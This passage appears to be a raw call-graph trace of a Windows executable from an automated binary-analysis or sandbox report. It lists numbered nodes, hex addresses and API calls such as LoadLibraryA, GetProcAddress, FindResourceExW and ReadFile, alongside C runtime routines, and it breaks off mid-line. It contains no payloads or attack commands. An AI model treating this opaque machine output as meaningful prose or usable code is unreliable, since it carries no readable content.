93047->93044 93051 edf4ea 48 API calls 93047->93051 93049 f349c4 93048->93049 93050 edf4ea 48 API calls 93049->93050 93056 f349cf 93050->93056 93052 ed1c9f 93051->93052 93053 ed1cb2 93052->93053 93715 ec2925 48 API calls 93052->93715 93053->92782 93055 edf4ea 48 API calls 93055->93056 93056->93055 93056->93057 93057->93047 93716 edc15c 48 API calls 93057->93716 93058->92782 93068 ecbdfa 93059->93068 93061 ec61b1 93061->92972 93063 ec651b 93062->93063 93067 ec64dd ___crtGetEnvironmentStringsW 93062->93067 93066 edf4ea 48 API calls 93063->93066 93064 edf4ea 48 API calls 93065 ec64e4 93064->93065 93065->92980 93066->93067 93067->93064 93069 ecbe0d 93068->93069 93073 ecbe0a ___crtGetEnvironmentStringsW 93068->93073 93070 edf4ea 48 API calls 93069->93070 93071 ecbe17 93070->93071 93074 edee75 93071->93074 93073->93061 93076 edf4ea __calloc_impl 93074->93076 93075 ee395c _W_store_winword 47 API calls 93075->93076 93076->93075 93077 edf50c 93076->93077 93078 edf50e std::exception::exception 93076->93078 93077->93073 93083 ee6805 RaiseException 93078->93083 93080 edf538 93084 ee673b 47 API calls _free 93080->93084 93082 edf54a 93082->93073 93083->93080 93084->93082 93150 ec4214 93085->93150 93090 f34f73 93092 ec4252 84 API calls 93090->93092 93091 ec41d4 LoadLibraryExW 93160 ec4291 93091->93160 93094 f34f7a 93092->93094 93096 ec4291 3 API calls 93094->93096 93098 f34f82 93096->93098 93186 ec44ed 93098->93186 93099 ec41fb 93099->93098 93100 ec4207 93099->93100 93102 ec4252 84 API calls 93100->93102 93104 ec39fe 93102->93104 93104->92985 93109 f0c396 93104->93109 93106 f34fa9 93194 ec4950 93106->93194 93108 f34fb6 93110 ec4517 83 API calls 93109->93110 93111 f0c405 93110->93111 93490 f0c56d 93111->93490 93114 ec44ed 64 API calls 93115 f0c432 93114->93115 93116 ec44ed 64 API calls 93115->93116 93117 f0c442 93116->93117 93118 ec44ed 64 API calls 93117->93118 93119 f0c45d 93118->93119 93120 ec44ed 64 API calls 93119->93120 93121 f0c478 93120->93121 93122 ec4517 83 API calls 93121->93122 93123 f0c48f 93122->93123 93124 ee395c _W_store_winword 47 API calls 93123->93124 93125 f0c496 93124->93125 93126 ee395c _W_store_winword 47 API calls 93125->93126 93127 f0c4a0 93126->93127 93128 ec44ed 64 API calls 93127->93128 93129 f0c4b4 93128->93129 93130 f0bf5a GetSystemTimeAsFileTime 93129->93130 93131 f0c4c7 93130->93131 93132 f0c4f1 93131->93132 93133 f0c4dc 93131->93133 93135 f0c556 93132->93135 93136 f0c4f7 93132->93136 93134 ee1c9d _free 47 API calls 93133->93134 93137 f0c4e2 93134->93137 93139 ee1c9d _free 47 API calls 93135->93139 93496 f0b965 93136->93496 93140 ee1c9d _free 47 API calls 93137->93140 93142 f0c41b 93139->93142 93140->93142 93142->92988 93144 ec4252 93142->93144 93143 ee1c9d _free 47 API calls 93143->93142 93145 ec425c 93144->93145 93146 ec4263 93144->93146 93147 ee35e4 __fcloseall 83 API calls 93145->93147 93148 ec4272 93146->93148 93149 ec4283 FreeLibrary 93146->93149 93147->93146 93148->92988 93149->93148 93199 ec4339 93150->93199 93153 ec423c 93154 ec41bb 93153->93154 93155 ec4244 FreeLibrary 93153->93155 93157 ee3499 93154->93157 93155->93154 93207 ee34ae 93157->93207 93159 ec41c8 93159->93090 93159->93091 93286 ec42e4 93160->93286 93163 ec42b8 93165 ec41ec 93163->93165 93166 ec42c1 FreeLibrary 93163->93166 93167 ec4380 93165->93167 93166->93165 93168 edf4ea 48 API calls 93167->93168 93169 ec4395 93168->93169 93294 ec47b7 93169->93294 93171 ec43dc 93173 ec4950 57 API calls 93171->93173 93172 ec43a1 ___crtGetEnvironmentStringsW 93172->93171 93174 ec4499 93172->93174 93175 ec44d1 93172->93175 93183 ec43e5 93173->93183 93297 ec406b CreateStreamOnHGlobal 93174->93297 93308 f0c750 93 API calls 93175->93308 93178 ec44ed 64 API calls 93178->93183 93180 ec4479 93180->93099 93181 f34ed7 93182 ec4517 83 API calls 93181->93182 93184 f34eeb 93182->93184 93183->93178 93183->93180 93183->93181 93303 ec4517 93183->93303 93185 ec44ed 64 API calls 93184->93185 93185->93180 93187 f34fc0 93186->93187 93188 ec44ff 93186->93188 93332 ee381e 93188->93332 93191 f0bf5a 93467 f0bdb4 93191->93467 93193 f0bf70 93193->93106 93195 ec495f 93194->93195 93198 f35002 93194->93198 93472 ee3e65 93195->93472 93197 ec4967 93197->93108 93203 ec434b 93199->93203 93202 ec4321 LoadLibraryA GetProcAddress 93202->93153 93204 ec422f 93203->93204 93205 ec4354 LoadLibraryA 93203->93205 93204->93153 93204->93202 93205->93204 93206 ec4365 GetProcAddress 93205->93206 93206->93204 93210 ee34ba __freefls@4 93207->93210 93208 ee34cd 93255 ee7c0e 47 API calls __getptd_noexit 93208->93255 93210->93208 93211 ee34fe 93210->93211 93226 eee4c8 93211->93226 93212 ee34d2 93256 ee6e10 8 API calls __gmtime64_s 93212->93256 93215 ee3503 93216 ee350c 93215->93216 93217 ee3519 93215->93217 93257 ee7c0e 47 API calls __getptd_noexit 93216->93257 93219 ee3543 93217->93219 93220 ee3523 93217->93220 93240 eee5e0 93219->93240 93258 ee7c0e 47 API calls __getptd_noexit 93220->93258 93221 ee34dd @_EH4_CallFilterFunc@8 __freefls@4 93221->93159 93227 eee4d4 __freefls@4 93226->93227 93228 ee7cf4 __lock 47 API calls 93227->93228 93238 eee4e2 93228->93238 93229 eee552 93260 eee5d7 93229->93260 93230 eee559 93265 ee69d0 47 API calls _W_store_winword 93230->93265 93233 eee560 93233->93229 93235 eee56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 93233->93235 93234 eee5cc __freefls@4 93234->93215 93235->93229 93236 ee7d7c __mtinitlocknum 47 API calls 93236->93238 93238->93229 93238->93230 93238->93236 93263 ee4e5b 48 API calls __lock 93238->93263 93264 ee4ec5 LeaveCriticalSection LeaveCriticalSection _doexit 93238->93264 93241 eee600 __wopenfile 93240->93241 93242 eee61a 93241->93242 93254 eee7d5 93241->93254 93272 ee185b 59 API calls 3 library calls 93241->93272 93270 ee7c0e 47 API calls __getptd_noexit 93242->93270 93244 eee61f 93271 ee6e10 8 API calls __gmtime64_s 93244->93271 93246 eee838 93267 ef63c9 93246->93267 93247 ee354e 93259 ee3570 LeaveCriticalSection LeaveCriticalSection _fseek 93247->93259 93250 eee7ce 93250->93254 93273 ee185b 59 API calls 3 library calls 93250->93273 93252 eee7ed 93252->93254 93274 ee185b 59 API calls 3 library calls 93252->93274 93254->93242 93254->93246 93255->93212 93256->93221 93257->93221 93258->93221 93259->93221 93266 ee7e58 LeaveCriticalSection 93260->93266 93262 eee5de 93262->93234 93263->93238 93264->93238 93265->93233 93266->93262 93275 ef5bb1 93267->93275 93269 ef63e2 93269->93247 93270->93244 93271->93247 93272->93250 93273->93252 93274->93254 93278 ef5bbd __freefls@4 93275->93278 93276 ef5bcf 93277 ee7c0e __fseek_nolock 47 API calls 93276->93277 93279 ef5bd4 93277->93279 93278->93276 93280 ef5c06 93278->93280 93281 ee6e10 __gmtime64_s 8 API calls 93279->93281 93282 ef5c78 __wsopen_helper 110 API calls 93280->93282 93285 ef5bde __freefls@4 93281->93285 93283 ef5c23 93282->93283 93284 ef5c4c __wsopen_helper LeaveCriticalSection 93283->93284 93284->93285 93285->93269 93290 ec42f6 93286->93290 93289 ec42cc LoadLibraryA GetProcAddress 93289->93163 93291 ec42aa 93290->93291 93292 ec42ff LoadLibraryA 93290->93292 93291->93163 93291->93289 93292->93291 93293 ec4310 GetProcAddress 93292->93293 93293->93291 93295 edf4ea 48 API calls 93294->93295 93296 ec47c9 93295->93296 93296->93172 93298 ec4085 FindResourceExW 93297->93298 93300 ec40a2 93297->93300 93299 f34f16 LoadResource 93298->93299 93298->93300 93299->93300 93301 f34f2b SizeofResource 93299->93301 93300->93171 93301->93300 93302 f34f3f LockResource 93301->93302 93302->93300 93304 f34fe0 93303->93304 93305 ec4526 93303->93305 93309 ee3a8d 93305->93309 93307 ec4534 93307->93183 93308->93171 93310 ee3a99 __freefls@4 93309->93310 93311 ee3aa7 93310->93311 93312 ee3acd 93310->93312 93322 ee7c0e 47 API calls __getptd_noexit 93311->93322 93324 ee4e1c 93312->93324 93315 ee3aac 93323 ee6e10 8 API calls __gmtime64_s 93315->93323 93317 ee3ad3 93330 ee39fe 81 API calls 3 library calls 93317->93330 93319 ee3ae2 93331 ee3b04 LeaveCriticalSection LeaveCriticalSection _fseek 93319->93331 93321 ee3ab7 __freefls@4 93321->93307 93322->93315 93323->93321 93325 ee4e4e EnterCriticalSection 93324->93325 93326 ee4e2c 93324->93326 93328 ee4e44 93325->93328 93326->93325 93327 ee4e34 93326->93327 93329 ee7cf4 __lock 47 API calls 93327->93329 93328->93317 93329->93328 93330->93319 93331->93321 93335 ee3839 93332->93335 93334 ec4510 93334->93191 93336 ee3845 __freefls@4 93335->93336 93337 ee385b _memset 93336->93337 93338 ee3888 93336->93338 93339 ee3880 __freefls@4 93336->93339 93362 ee7c0e 47 API calls __getptd_noexit 93337->93362 93340 ee4e1c __lock_file 48 API calls 93338->93340 93339->93334 93341 ee388e 93340->93341 93348 ee365b 93341->93348 93344 ee3875 93363 ee6e10 8 API calls __gmtime64_s 93344->93363 93352 ee3676 _memset 93348->93352 93355 ee3691 93348->93355 93349 ee3681 93463 ee7c0e 47 API calls __getptd_noexit 93349->93463 93351 ee3686 93464 ee6e10 8 API calls __gmtime64_s 93351->93464 93352->93349 93352->93355 93360 ee36cf 93352->93360 93364 ee38c2 LeaveCriticalSection LeaveCriticalSection _fseek 93355->93364 93356 ee37e0 _memset 93466 ee7c0e 47 API calls __getptd_noexit 93356->93466 93360->93355 93360->93356 93365 ee2933 93360->93365 93372 eeee0e 93360->93372 93443 eeeb66 93360->93443 93465 eeec87 47 API calls 4 library calls 93360->93465 93362->93344 93363->93339 93364->93339 93366 ee293d 93365->93366 93367 ee2952 93365->93367 93368 ee7c0e __fseek_nolock 47 API calls 93366->93368 93367->93360 93369 ee2942 93368->93369 93370 ee6e10 __gmtime64_s 8 API calls 93369->93370 93371 ee294d 93370->93371 93371->93360 93373 eeee2f 93372->93373 93374 eeee46 93372->93374 93375 ee7bda __chsize_nolock 47 API calls 93373->93375 93376 eef57e 93374->93376 93380 eeee80 93374->93380 93377 eeee34 93375->93377 93378 ee7bda __chsize_nolock 47 API calls 93376->93378 93379 ee7c0e __fseek_nolock 47 API calls 93377->93379 93381 eef583 93378->93381 93423 eeee3b 93379->93423 93382 eeee88 93380->93382 93388 eeee9f 93380->93388 93383 ee7c0e __fseek_nolock 47 API calls 93381->93383 93385 ee7bda __chsize_nolock 47 API calls 93382->93385 93384 eeee94 93383->93384 93387 ee6e10 __gmtime64_s 8 API calls 93384->93387 93386 eeee8d 93385->93386 93392 ee7c0e __fseek_nolock 47 API calls 93386->93392 93387->93423 93389 eeeeb4 93388->93389 93391 eeeece 93388->93391 93393 eeeeec 93388->93393 93388->93423 93390 ee7bda __chsize_nolock 47 API calls 93389->93390 93390->93386 93391->93389 93398 eeeed9 93391->93398 93392->93384 93395 ee69d0 __malloc_crt 47 API calls 93393->93395 93396 eeeefc 93395->93396 93399 eeef1f 93396->93399 93400 eeef04 93396->93400 93397 ef3bf2 __stbuf 47 API calls 93401 eeefed 93397->93401 93398->93397 93404 eef82f __lseeki64_nolock 49 API calls 93399->93404 93402 ee7c0e __fseek_nolock 47 API calls 93400->93402 93403 eef066 ReadFile 93401->93403 93408 eef003 GetConsoleMode 93401->93408 93405 eeef09 93402->93405 93406 eef088 93403->93406 93407 eef546 GetLastError 93403->93407 93409 eeef2d 93404->93409 93410 ee7bda __chsize_nolock 47 API calls 93405->93410 93406->93407 93416 eef058 93406->93416 93411 eef046 93407->93411 93412 eef553 93407->93412 93413 eef017 93408->93413 93414 eef063 93408->93414 93409->93398 93415 eeef14 93410->93415 93421 ee7bed __dosmaperr 47 API calls 93411->93421 93425 eef04c 93411->93425 93417 ee7c0e __fseek_nolock 47 API calls 93412->93417 93413->93414 93418 eef01d ReadConsoleW 93413->93418 93414->93403 93415->93423 93416->93425 93426 eef0bd 93416->93426 93435 eef32a 93416->93435 93419 eef558 93417->93419 93418->93416 93420 eef040 GetLastError 93418->93420 93422 ee7bda __chsize_nolock 47 API calls 93419->93422 93420->93411 93421->93425 93422->93425 93423->93360 93424 ee1c9d _free 47 API calls 93424->93423 93425->93423 93425->93424 93427 eef129 ReadFile 93426->93427 93433 eef1aa 93426->93433 93430 eef14a GetLastError 93427->93430 93441 eef154 93427->93441 93429 eef430 ReadFile 93436 eef453 GetLastError 93429->93436 93442 eef461 93429->93442 93430->93441 93431 eef267 93437 eef82f __lseeki64_nolock 49 API calls 93431->93437 93438 eef217 MultiByteToWideChar 93431->93438 93432 eef257 93434 ee7c0e __fseek_nolock 47 API calls 93432->93434 93433->93425 93433->93431 93433->93432 93433->93438 93434->93425 93435->93425 93435->93429 93436->93442 93437->93438 93438->93420 93438->93425 93439 eef82f __lseeki64_nolock 49 API calls 93439->93441 93440 eef82f __lseeki64_nolock 49 API calls 93440->93442 93441->93426 93441->93439 93442->93435 93442->93440 93444 eeeb71 93443->93444 93447 eeeb86 93443->93447 93445 ee7c0e __fseek_nolock 47 API calls 93444->93445 93446 eeeb76 93445->93446 93448 ee6e10 __gmtime64_s 8 API calls 93446->93448 93449 eeebbb 93447->93449 93450 ef3e24 __getbuf 47 API calls 93447->93450 93454 eeeb81 93447->93454 93448->93454 93451 ee2933 __fseek_nolock 47 API calls 93449->93451 93450->93449 93452 eeebcf 93451->93452 93453 eeed06 __filbuf 62 API calls 93452->93453 93455 eeebd6 93453->93455 93454->93360 93455->93454 93456 ee2933 __fseek_nolock 47 API calls 93455->93456 93457 eeebf9 93456->93457 93457->93454 93458 ee2933 __fseek_nolock 47 API calls 93457->93458 93459 eeec05 93458->93459 93459->93454 93460 ee2933 __fseek_nolock 47 API calls 93459->93460 93461 eeec12 93460->93461 93462 ee2933 __fseek_nolock 47 API calls 93461->93462 93462->93454 93463->93351 93464->93355 93465->93360 93466->93351 93470 ee344a GetSystemTimeAsFileTime 93467->93470 93469 f0bdc3 93469->93193 93471 ee3478 __aulldiv 93470->93471 93471->93469 93473 ee3e71 __freefls@4 93472->93473 93474 ee3e7f 93473->93474 93475 ee3e94 93473->93475 93486 ee7c0e 47 API calls __getptd_noexit 93474->93486 93477 ee4e1c __lock_file 48 API calls 93475->93477 93479 ee3e9a 93477->93479 93478 ee3e84 93487 ee6e10 8 API calls __gmtime64_s 93478->93487 93488 ee3b0c 55 API calls 5 library calls 93479->93488 93482 ee3e8f __freefls@4 93482->93197 93483 ee3ea5 93489 ee3ec5 LeaveCriticalSection LeaveCriticalSection _fseek 93483->93489 93485 ee3eb7 93485->93482 93486->93478 93487->93482 93488->93483 93489->93485 93495 f0c581 __tzset_nolock _wcscmp 93490->93495 93491 ec44ed 64 API calls 93491->93495 93492 f0c417 93492->93114 93492->93142 93493 f0bf5a GetSystemTimeAsFileTime 93493->93495 93494 ec4517 83 API calls 93494->93495 93495->93491 93495->93492 93495->93493 93495->93494 93497 f0b970 93496->93497 93498 f0b97e 93496->93498 93499 ee3499 117 API calls 93497->93499 93500 f0b9c3 93498->93500 93501 ee3499 117 API calls 93498->93501 93511 f0b987 93498->93511 93499->93498 93527 f0bbe8 93500->93527 93503 f0b9a8 93501->93503 93503->93500 93505 f0b9b1 93503->93505 93504 f0ba07 93506 f0ba0b 93504->93506 93507 f0ba2c 93504->93507 93510 ee35e4 __fcloseall 83 API calls 93505->93510 93505->93511 93509 f0ba18 93506->93509 93513 ee35e4 __fcloseall 83 API calls 93506->93513 93531 f0b7e5 93507->93531 93509->93511 93516 ee35e4 __fcloseall 83 API calls 93509->93516 93510->93511 93511->93143 93513->93509 93514 f0ba5a 93540 f0ba8a 93514->93540 93515 f0ba3a 93518 ee35e4 __fcloseall 83 API calls 93515->93518 93519 f0ba47 93515->93519 93516->93511 93518->93519 93519->93511 93521 ee35e4 __fcloseall 83 API calls 93519->93521 93521->93511 93524 f0ba75 93524->93511 93526 ee35e4 __fcloseall 83 API calls 93524->93526 93526->93511 93528 f0bc0d 93527->93528 93530 f0bbf6 __tzset_nolock ___crtGetEnvironmentStringsW 93527->93530 93529 ee381e __fread_nolock 64 API calls 93528->93529 93529->93530 93530->93504 93532 ee395c _W_store_winword 47 API calls 93531->93532 93533 f0b7f4 93532->93533 93534 ee395c _W_store_winword 47 API calls 93533->93534 93535 f0b808 93534->93535 93536 ee395c _W_store_winword 47 API calls 93535->93536 93538 f0b81c 93536->93538 93537 f0bb64 47 API calls 93539 f0b82f 93537->93539 93538->93537 93538->93539 93539->93514 93539->93515 93547 f0baa0 93540->93547 93541 f0bb51 93573 f0bd8a 93541->93573 93542 f0b841 64 API calls 93542->93547 93544 f0ba61 93548 f0bb64 93544->93548 93547->93541 93547->93542 93547->93544 93569 f0bc67 93547->93569 93577 f0b942 64 API calls 93547->93577 93549 f0bb71 93548->93549 93551 f0bb77 93548->93551 93550 ee1c9d _free 47 API calls 93549->93550 93550->93551 93552 f0bb88 93551->93552 93553 ee1c9d _free 47 API calls 93551->93553 93554 f0ba68 93552->93554 93555 ee1c9d _free 47 API calls 93552->93555 93553->93552 93554->93524 93556 ee35e4 93554->93556 93555->93554 93557 ee35f0 __freefls@4 93556->93557 93558 ee361c 93557->93558 93559 ee3604 93557->93559 93561 ee4e1c __lock_file 48 API calls 93558->93561 93565 ee3614 __freefls@4 93558->93565 93611 ee7c0e 47 API calls __getptd_noexit 93559->93611 93563 ee362e 93561->93563 93562 ee3609 93612 ee6e10 8 API calls __gmtime64_s 93562->93612 93595 ee3578 93563->93595 93565->93524 93571 f0bc76 93569->93571 93572 f0bcb6 93569->93572 93571->93547 93572->93571 93578 f0bd3d 93572->93578 93574 f0bda8 93573->93574 93575 f0bd97 93573->93575 93574->93544 93576 ee2aae 80 API calls 93575->93576 93576->93574 93577->93547 93579 f0bd7a 93578->93579 93580 f0bd69 93578->93580 93579->93572 93582 ee2aae 93580->93582 93583 ee2aba __freefls@4 93582->93583 93584 ee2aec 93583->93584 93585 ee2ad4 93583->93585 93586 ee2ae4 __freefls@4 93583->93586 93587 ee4e1c __lock_file 48 API calls 93584->93587 93588 ee7c0e __fseek_nolock 47 API calls 93585->93588 93586->93579 93589 ee2af2 93587->93589 93590 ee2ad9 93588->93590 93591 ee2957 78 API calls 93589->93591 93592 ee6e10 __gmtime64_s 8 API calls 93590->93592 93593 ee2b06 93591->93593 93592->93586 93594 ee2b24 LeaveCriticalSection LeaveCriticalSection 93593->93594 93594->93586 93596 ee359b 93595->93596 93597 ee3587 93595->93597 93609 ee3597 93596->93609 93614 ee2c84 93596->93614 93647 ee7c0e 47 API calls __getptd_noexit 93597->93647 93599 ee358c 93648 ee6e10 8 API calls __gmtime64_s 93599->93648 93605 ee2933 __fseek_nolock 47 API calls 93606 ee35b5 93605->93606 93624 eee9d2 93606->93624 93608 ee35bb 93608->93609 93610 ee1c9d _free 47 API calls 93608->93610 93613 ee3653 LeaveCriticalSection LeaveCriticalSection _fseek 93609->93613 93610->93609 93611->93562 93612->93565 93613->93565 93615 ee2c97 93614->93615 93616 ee2cbb 93614->93616 93615->93616 93617 ee2933 __fseek_nolock 47 API calls 93615->93617 93620 eeeb36 93616->93620 93618 ee2cb4 93617->93618 93649 eeaf61 93618->93649 93621 ee35af 93620->93621 93622 eeeb43 93620->93622 93621->93605 93622->93621 93623 ee1c9d _free 47 API calls 93622->93623 93623->93621 93625 eee9de __freefls@4 93624->93625 93626 eee9fe 93625->93626 93627 eee9e6 93625->93627 93629 eeea7b 93626->93629 93634 eeea28 93626->93634 93698 ee7bda 47 API calls __getptd_noexit 93627->93698 93702 ee7bda 47 API calls __getptd_noexit 93629->93702 93630 eee9eb 93699 ee7c0e 47 API calls __getptd_noexit 93630->93699 93633 eeea80 93703 ee7c0e 47 API calls __getptd_noexit 93633->93703 93674 eea8ed 93634->93674 93637 eeea88 93704 ee6e10 8 API calls __gmtime64_s 93637->93704 93638 eeea2e 93640 eeea4c 93638->93640 93641 eeea41 93638->93641 93700 ee7c0e 47 API calls __getptd_noexit 93640->93700 93683 eeea9c 93641->93683 93643 eee9f3 __freefls@4 93643->93608 93645 eeea47 93701 eeea73 LeaveCriticalSection __unlock_fhandle 93645->93701 93647->93599 93648->93609 93650 eeaf6d __freefls@4 93649->93650 93651 eeaf8d 93650->93651 93652 eeaf75 93650->93652 93654 eeb022 93651->93654 93658 eeafbf 93651->93658 93653 ee7bda __chsize_nolock 47 API calls 93652->93653 93655 eeaf7a 93653->93655 93656 ee7bda __chsize_nolock 47 API calls 93654->93656 93657 ee7c0e __fseek_nolock 47 API calls 93655->93657 93659 eeb027 93656->93659 93660 eeaf82 __freefls@4 93657->93660 93661 eea8ed ___lock_fhandle 49 API calls 93658->93661 93662 ee7c0e __fseek_nolock 47 API calls 93659->93662 93660->93616 93663 eeafc5 93661->93663 93664 eeb02f 93662->93664 93665 eeafeb 93663->93665 93666 eeafd8 93663->93666 93667 ee6e10 __gmtime64_s 8 API calls 93664->93667 93669 ee7c0e __fseek_nolock 47 API calls 93665->93669 93668 eeb043 __chsize_nolock 75 API calls 93666->93668 93667->93660 93670 eeafe4 93668->93670 93671 eeaff0 93669->93671 93673 eeb01a __flush LeaveCriticalSection 93670->93673 93672 ee7bda __chsize_nolock 47 API calls 93671->93672 93672->93670 93673->93660 93676 eea8f9 __freefls@4 93674->93676 93675 eea946 EnterCriticalSection 93678 eea96c __freefls@4 93675->93678 93676->93675 93677 ee7cf4 __lock 47 API calls 93676->93677 93679 eea91d 93677->93679 93678->93638 93680 eea93a 93679->93680 93681 eea928 InitializeCriticalSectionAndSpinCount 93679->93681 93682 eea970 ___lock_fhandle LeaveCriticalSection 93680->93682 93681->93680 93682->93675 93684 eeaba4 __chsize_nolock 47 API calls 93683->93684 93686 eeeaaa 93684->93686 93685 eeeb00 93688 eeab1e __free_osfhnd 48 API calls 93685->93688 93686->93685 93687 eeeade 93686->93687 93689 eeaba4 __chsize_nolock 47 API calls 93686->93689 93687->93685 93690 eeaba4 __chsize_nolock 47 API calls 93687->93690 93691 eeeb08 93688->93691 93692 eeead5 93689->93692 93693 eeeaea CloseHandle 93690->93693 93694 eeeb2a 93691->93694 93695 ee7bed __dosmaperr 47 API calls 93691->93695 93696 eeaba4 __chsize_nolock 47 API calls 93692->93696 93693->93685 93697 eeeaf6 GetLastError 93693->93697 93694->93645 93695->93694 93696->93687 93697->93685 93698->93630 93699->93643 93700->93645 93701->93643 93702->93633 93703->93637 93704->93643 93705->92996 93706->93003 93707->93013 93708->93013 93709->93014 93710->93027 93711->93029 93712->93025 93713->93034 93714->93039 93715->93053 93716->93047 93776 eef8a0 93717->93776 93720 ec6a63 48 API calls 93721 ec6643 93720->93721 93778 ec6571 93721->93778 93724 ec40a7 93725 eef8a0 __ftell_nolock 93724->93725 93726 ec40b4 GetLongPathNameW 93725->93726 93727 ec6a63 48 API calls 93726->93727 93728 ec40dc 93727->93728 93729 ec49a0 93728->93729 93730 ecd7f7 48 API calls 93729->93730 93731 ec49b2 93730->93731 93732 ec660f 49 API calls 93731->93732 93733 ec49bd 93732->93733 93734 ec49c8 93733->93734 93738 f32e35 93733->93738 93735 ec64cf 48 API calls 93734->93735 93737 ec49d4 93735->93737 93786 ec28a6 93737->93786 93740 f32e4f 93738->93740 93792 edd35e 60 API calls 93738->93792 93741 ec49e7 Mailbox 93741->92798 93743 ec41a9 136 API calls 93742->93743 93744 ec415e 93743->93744 93745 f33489 93744->93745 93746 ec41a9 136 API calls 93744->93746 93747 f0c396 122 API calls 93745->93747 93748 ec4172 93746->93748 93749 f3349e 93747->93749 93748->93745 93750 ec417a 93748->93750 93751 f334a2 93749->93751 93752 f334bf 93749->93752 93754 f334aa 93750->93754 93755 ec4186 93750->93755 93756 ec4252 84 API calls 93751->93756 93753 edf4ea 48 API calls 93752->93753 93775 f33504 Mailbox 93753->93775 93881 f06b49 87 API calls _wprintf 93754->93881 93793 ecc833 93755->93793 93756->93754 93760 f334b8 93760->93752 93761 f336b4 93762 ee1c9d _free 47 API calls 93761->93762 93763 f336bc 93762->93763 93764 ec4252 84 API calls 93763->93764 93769 f336c5 93764->93769 93768 ee1c9d _free 47 API calls 93768->93769 93769->93768 93770 ec4252 84 API calls 93769->93770 93887 f025b5 86 API calls 4 library calls 93769->93887 93770->93769 93772 ecce19 48 API calls 93772->93775 93775->93761 93775->93769 93775->93772 93882 f02551 48 API calls ___crtGetEnvironmentStringsW 93775->93882 93883 f02472 60 API calls 2 library calls 93775->93883 93884 f09c12 48 API calls 93775->93884 93885 ecba85 48 API calls ___crtGetEnvironmentStringsW 93775->93885 93886 ec4dd9 48 API calls 93775->93886 93777 ec661c GetFullPathNameW 93776->93777 93777->93720 93779 ec657f 93778->93779 93782 ecb18b 93779->93782 93781 ec4114 93781->93724 93783 ecb199 93782->93783 93785 ecb1a2 ___crtGetEnvironmentStringsW 93782->93785 93784 ecbdfa 48 API calls 93783->93784 93783->93785 93784->93785 93785->93781 93787 ec28b8 93786->93787 93791 ec28d7 ___crtGetEnvironmentStringsW 93786->93791 93789 edf4ea 48 API calls 93787->93789 93788 edf4ea 48 API calls 93790 ec28ee 93788->93790 93789->93791 93790->93741 93791->93788 93792->93738 93794 ecc843 __ftell_nolock 93793->93794 93795 f33095 93794->93795 93796 ecc860 93794->93796 93929 f025b5 86 API calls 4 library calls 93795->93929 93893 ec48ba 49 API calls 93796->93893 93799 ecc882 93894 ec4550 93799->93894 93800 f330a8 93930 f025b5 86 API calls 4 library calls 93800->93930 93804 ecc89f 93806 ecd7f7 48 API calls 93804->93806 93805 f330c4 93808 ecc90c 93805->93808 93807 ecc8ab 93806->93807 93905 ede968 49 API calls __ftell_nolock 93807->93905 93810 f330d7 93808->93810 93811 ecc91a 93808->93811 93814 ec4907 CloseHandle 93810->93814 93915 ee1dfc 93811->93915 93812 ecc8b7 93815 ecd7f7 48 API calls 93812->93815 93816 f330e3 93814->93816 93817 ecc8c3 93815->93817 93818 ec41a9 136 API calls 93816->93818 93819 ec660f 49 API calls 93817->93819 93820 f3310d 93818->93820 93821 ecc8d1 93819->93821 93823 f33136 93820->93823 93828 f0c396 122 API calls 93820->93828 93906 edeb66 SetFilePointerEx ReadFile 93821->93906 93822 ecc943 _wcscat _wcscpy 93827 ecc96d SetCurrentDirectoryW 93822->93827 93931 f025b5 86 API calls 4 library calls 93823->93931 93825 ecc8fd 93907 ec46ce 93825->93907 93831 edf4ea 48 API calls 93827->93831 93832 f33129 93828->93832 93830 f3314d 93865 eccad1 Mailbox 93830->93865 93833 ecc988 93831->93833 93834 f33152 93832->93834 93835 f33131 93832->93835 93837 ec47b7 48 API calls 93833->93837 93836 ec4252 84 API calls 93834->93836 93838 ec4252 84 API calls 93835->93838 93839 f33157 93836->93839 93868 ecc993 Mailbox __NMSG_WRITE 93837->93868 93838->93823 93840 edf4ea 48 API calls 93839->93840 93847 f33194 93840->93847 93841 ecca9d 93925 ec4907 93841->93925 93845 ec3d98 93845->92666 93845->92689 93846 eccaa9 SetCurrentDirectoryW 93846->93865 93932 ecba85 48 API calls ___crtGetEnvironmentStringsW 93847->93932 93851 f333ce 93938 f09b72 48 API calls 93851->93938 93852 f33467 93942 f025b5 86 API calls 4 library calls 93852->93942 93856 f33480 93856->93841 93857 f333f0 93939 f229e8 48 API calls ___crtGetEnvironmentStringsW 93857->93939 93859 f333fd 93861 ee1c9d _free 47 API calls 93859->93861 93860 f3345f 93941 f0240b 48 API calls 3 library calls 93860->93941 93861->93865 93863 ecce19 48 API calls 93863->93868 93888 ec48dd 93865->93888 93868->93841 93868->93852 93868->93860 93868->93863 93918 ecb337 56 API calls _wcscpy 93868->93918 93919 edc258 GetStringTypeW 93868->93919 93920 eccb93 59 API calls __wcsnicmp 93868->93920 93921 eccb5a GetStringTypeW __NMSG_WRITE 93868->93921 93922 ee16d0 GetStringTypeW wcstoxq 93868->93922 93923 eccc24 162 API calls 3 library calls 93868->93923 93924 edc682 48 API calls 93868->93924 93872 ecce19 48 API calls 93878 f331dd Mailbox 93872->93878 93875 f33420 93940 f025b5 86 API calls 4 library calls 93875->93940 93877 f33439 93879 ee1c9d _free 47 API calls 93877->93879 93878->93851 93878->93872 93878->93875 93933 f02551 48 API calls ___crtGetEnvironmentStringsW 93878->93933 93934 f02472 60 API calls 2 library calls 93878->93934 93935 f09c12 48 API calls 93878->93935 93936 ecba85 48 API calls ___crtGetEnvironmentStringsW 93878->93936 93937 edc682 48 API calls 93878->93937 93880 f3344c 93879->93880 93880->93865 93881->93760 93882->93775 93883->93775 93884->93775 93885->93775 93886->93775 93887->93769 93889 ec4907 CloseHandle 93888->93889 93890 ec48e5 Mailbox 93889->93890 93891 ec4907 CloseHandle 93890->93891 93892 ec48fc 93891->93892 93892->93845 93893->93799 93895 ec4907 CloseHandle 93894->93895 93896 ec455b 93895->93896 93943 ec47ff 93896->93943 93900 ec458d 93971 ec45be SetFilePointerEx SetFilePointerEx 93900->93971 93902 ec4594 93972 ec4845 SetFilePointerEx SetFilePointerEx WriteFile 93902->93972 93904 ec459b 93904->93800 93904->93804 93905->93812 93906->93825 93913 ec46e8 93907->93913 93908 f340d0 93986 ec4798 SetFilePointerEx 93908->93986 93909 ec476d SetFilePointerEx 93985 ec4798 SetFilePointerEx 93909->93985 93912 f340ea 93913->93908 93913->93909 93914 ec4743 93913->93914 93914->93808 93987 ee1e46 93915->93987 93918->93868 93919->93868 93920->93868 93921->93868 93922->93868 93923->93868 93924->93868 93926 ec4920 93925->93926 93927 